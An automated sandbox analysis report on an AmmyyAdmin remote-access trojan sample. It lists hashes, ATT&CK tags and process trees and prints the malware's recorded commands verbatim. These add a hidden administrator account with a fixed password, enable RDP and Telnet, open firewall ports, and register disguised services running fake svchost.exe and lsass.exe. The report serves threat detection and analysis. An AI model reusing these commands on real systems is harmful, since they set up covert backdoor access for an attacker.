Malware Analysis Report

2024-10-16 05:10

Sample ID 240905-3e8b4atfrl
Target ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118
SHA256 48a16449873f16df73c4468805415769a863062802fdcb30568bf5bb2170bf17
Tags

defense_evasion discovery evasion execution persistence privilege_escalation ammyyadmin rat

Score

10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

48a16449873f16df73c4468805415769a863062802fdcb30568bf5bb2170bf17

Threat Level: Known bad

The file ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution persistence privilege_escalation ammyyadmin rat

Ammyy Admin

AmmyyAdmin payload

Grants admin privileges

Sets service image path in registry

Creates new service(s)

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Password Policy Discovery

Hide Artifacts: Hidden Users

Launches sc.exe

Permission Groups Discovery: Local Groups

Event Triggered Execution: Netsh Helper DLL

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-05 23:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-05 23:26

Reported

2024-09-05 23:29

Platform

win7-20240708-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

Signatures

Grants admin privileges

Creates new service(s)

persistence execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PlugAndPlay\ImagePath = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\svchost.exe -service -debug" C:\Windows\SysWOW64\REG.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A

Password Policy Discovery

discovery

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Microsoft = "0" C:\Windows\SysWOW64\REG.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2564 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2924 wrote to memory of 2704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1172 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2532 wrote to memory of 1824 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe" -silent

C:\Windows\SysWOW64\sc.exe

sc start mnmsrvc

C:\Windows\SysWOW64\sc.exe

sc Start TlntSvr

C:\Windows\SysWOW64\sc.exe

sc Start TermService

C:\Windows\SysWOW64\net.exe

net start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net.exe

net localgroup Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Администраторы Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Администраторы Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Microsoft /add

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Microsoft /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\sc.exe

sc stop "ProtocolWindows_ "

C:\Windows\SysWOW64\sc.exe

sc delete "ProtocolWindows_ "

C:\Windows\SysWOW64\sc.exe

sc create "ProtocolWindows_ " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" displayname= "Protocol HTTP/SSL " type= own start= auto error= ignore

C:\Windows\SysWOW64\sc.exe

sc description "ProtocolWindows_ " "Эта службa обеспечивает безопaсный протокол передачи данных гипертекста (HTTPS) для службы HTTP. Если эта служба отключенa, любые службы, которые явно зaвисят от нее, не могут быть запущены. "

C:\Windows\SysWOW64\sc.exe

sc stop "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc delete "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc create "PlugAndPlay" displayname= "PlugAndPlay " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" type= own start= auto error= ignore

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\services\PlugAndPlay" /v ImagePath /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_REGDWORD /d 3389 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN" /v iexplore.exe /t REG_REGDWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram ctfmon.exe ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 3389 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 31337 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 80 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 8080 name = TCP

Network

N/A

Files

memory/1172-0-0x0000000000400000-0x0000000000548000-memory.dmp

\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

MD5 c104fc64f8ed6950ce08a5d653e9e4d7
SHA1 e1186adecb3c647cbec0705df4a8aa80281790c9
SHA256 8ded98254676bb6a64435119df030d84e8186b75051b8a1e7928aa52c8bb3937
SHA512 2b6a7f44b34af744108769658391ff46e885f09f974c32f9a5b0b559bf9e93b1185acb8fe6841c74848e4e06ff9ee31aaca6a648d43f39ae16dcaa96d576335c

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1172-26-0x0000000000400000-0x0000000000548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe

MD5 6e0966f100cb1f523179c0adba52d45a
SHA1 d3d27da135e1388bc6619bc3f81a3324d2e9d645
SHA256 71059380b8346728a26de74e7a721e63bd9f18e81f1eec76adeabd998fb13e3b
SHA512 3dbebfd08ab3df57fefe193cd98f6ab8aeeff3406d70cc56604d8d0144de2c2b18a56f99281c93d21849badd0d76cbb943d09ce6573271af94fefb4323fbeefd

memory/1172-29-0x0000000000400000-0x0000000000548000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-05 23:26

Reported

2024-09-05 23:29

Platform

win10v2004-20240802-en

Max time kernel

125s

Max time network

127s

Command Line

